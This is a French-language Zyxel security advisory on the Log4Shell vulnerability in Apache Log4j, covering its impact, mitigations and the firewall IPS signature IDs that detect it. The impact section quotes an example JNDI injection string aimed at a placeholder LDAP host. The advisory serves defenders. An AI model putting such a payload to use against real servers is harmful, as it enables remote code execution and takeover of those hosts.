800x450_log4shell_shield

Se protéger contre Log4Shell

Apprenez comment les pare-feux Zyxel détectent et vous protègent contre la dernière vulnérabilité de log4j.

Package log4j
Log4j est un projet open-source énormément utilisé dans JAVA. Une vulnérabilité d’exécution de code à distance dans Log4j a été identifiée dans les versions entre 2.x.x et 2.14.x. (Un nouvel exploit, CVE-2021-45046, a toutefois également été identifié dans la version 2.15. Nous recommandons de passer à la version 2.17). Cette vulnérabilité permet aux assaillants d’envoyer une commande spécifique et d’atteindre facilement l’interface système (Log4shell) à distance.

Impact
Cette vulnérabilité a reçu le plus haut score CVSS possible (10) en raison de la très grande utilisation du package log4j et de son exécution à distance. Si le serveur est vulnérable, les assaillants peuvent envoyer des commandes (de type ${jndi:ldap:// example.com/a}) au package log4j et faire en sorte que le shell prenne la main sur le serveur. Compromis, l’hôte peut naturellement servir de bot, de mineur ou peut crypter vos fichiers importants par un ransomware.

Les équipements sécurité Zyxel sont-ils concernés ?
Zyxel a pris acte des vulnérabilités de RCE (exécution de code arbitraire à distance) dans Apache Log4j et confirme que les équipements sécurité Zyxel ne SONT PAS concernés. Les séries pare-feux ATP/USG FLEX Zyxel fournissent une protection multi-couches qui permet de vous protéger contre cette attaque.

Mitigation
Niveau hôte : Il est fortement recommandé de mettre la jour la dernière version d’Apache Log4j (>=2.17.0).

Niveau réseau :
  • Afin de réduire la portée de l’attaque, ne publiez pas les applications vulnérables sur Internet, sauf si cela est absolument nécessaire. Privilégiez la technologie VPN pour accéder aux applications à distance,
  • Mettez à jour les signatures pour IPS et activez la fonction IPS afin de protéger votre hôte. Si votre hôte utilise des transmissions SSL/TLS, activez également l’inspection SSL pour une meilleure détection. Lorsque l’attaque provient d’une adresse IP malveillante, la fonctionnalité réputation IP vous protège,
  • Activez les fonctions de filtrage DNS, filtrage par URL, filtrage de contenus, anti-virus et sandbox ; cela permet également de rompre la chaine et d’enrayer toute propagation.

Veuillez vous référer aux informations de signature
 

ATP/USGFLEX

v4.0.x.20211217.0

# Les Signatures ID 131026, 131027 et 131028 sont utilisées pour CVE-2021-44228.

# Les Signatures ID 131029 et 131030 sont utilisées pour CVE-2021-45046.

Plus d'information >
 
Référence
 
[1] Annonces Sécurité Zyxel pour les vulnérabilités Apache Log4j RCE (en anglais)